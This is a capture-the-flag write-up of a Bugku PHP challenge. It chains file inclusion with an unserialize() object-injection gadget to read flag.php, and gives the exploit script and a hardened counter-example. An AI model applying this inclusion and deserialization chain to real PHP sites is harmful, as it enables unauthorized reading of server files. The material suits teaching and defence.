Challenge
http://123.206.87.240:8006/test1/
After opening the challenge, look at the page source first. It displays the text below, and the PHP logic is left in an HTML comment:
you are not the number of bugku !
<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //hint.php
}else{
echo "you are not admin ! ";
}
-->
Based on the source, modify the POST request accordingly.
The response is a base64-encoded string. After decoding it,
try modifying the POST request again, which returns
another base64 string; decoding it gives the following code:
<?php
$txt = $_GET["txt"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){
echo "hello friend!<br>";
if(preg_match("/flag/",$file)){
echo "不能现在就给你flag哦";
exit();
}else{
include($file);
$password = unserialize($password);
echo $password;
}
}else{
echo "you are not the number of bugku ! ";
}
?>
<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //hint.php
}else{
echo "you are not admin ! ";
}
-->
Download SourceLeakHacker-master. SourceLeakHacker is a sensitive-directory scanning tool; the green 200 means the path can be accessed successfully, and that is the sensitive path it found.
Having found flag.php, modify the earlier request again and get its contents.
Then complete the Flag class obtained earlier into a runnable script that serializes the object:
<?php
class Flag{//flag.php
public $file;
public function __tostring(){ // magic method: invoked when the object is used as a string (echo)
if(isset($this->file)){
echo file_get_contents($this->file); // reads whatever file name is stored in the object
echo "<br>";
return ("good");
}
}
}
$o = new Flag();
$o->file="flag.php";
$o->__tostring(); // local sanity check of the method
echo serialize($o); // the serialized object to submit as the password parameter
?>
Serialization: serialize() returns a string containing a byte-stream representation of the value, which can be stored anywhere.
This is useful for storing or passing PHP values around without losing their type and structure. The serialized forms of the corresponding values are:
String: s:size:value;
Integer: i:value;
Boolean: b:value; (does not store "true" or "false", stores '1' or '0')
After running the script, the result is the serialized object.
This is the serialized content pointing at flag.php; modify the request once more with it as the password parameter, and after submitting we get the flag.
Finally we get the flag.
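As an added example (not part of the original writeup), here is the decoded unserialize()/__toString chain from the challenge next to a hardened version of the same call; the Flag class and the password parameter come from the page, while the function names and the sample payload are constructed for illustration:

```php
<?php
// Added example: the page's Flag gadget, and why unserialize() on user input is unsafe.
class Flag {
    public $file;
    public function __toString() {
        if (isset($this->file)) {
            // Reads any file name stored in the object: a file-read primitive.
            return file_get_contents($this->file) . "<br>";
        }
        return "";
    }
}

// Constructed payload: the same string the writeup's script prints.
$flag = new Flag();
$flag->file = "flag.php";
$payload = serialize($flag);

// Vulnerable form (as in the decoded index.php): unserialize() rebuilds the Flag
// object, and echoing it invokes Flag::__toString(), which reads the file.
function vulnerable(string $password): string {
    $obj = unserialize($password);
    return (string)$obj;
}

// Hardened form: forbid object instantiation and accept only scalar strings.
// Objects come back as __PHP_Incomplete_Class, so the gadget never runs.
function hardened(string $password): ?string {
    $val = @unserialize($password, ['allowed_classes' => false]);
    if (!is_string($val)) {
        return null; // object, int, bool or malformed input is rejected
    }
    return $val;
}

var_dump(hardened($payload));            // the Flag gadget is not executed
var_dump(hardened(serialize("hello")));  // a plain serialized string still works
```

Where the application never needs objects in a serialized value, passing allowed_classes => false (or switching the format to JSON) removes the magic-method entry point entirely rather than relying on the keyword filter the challenge uses.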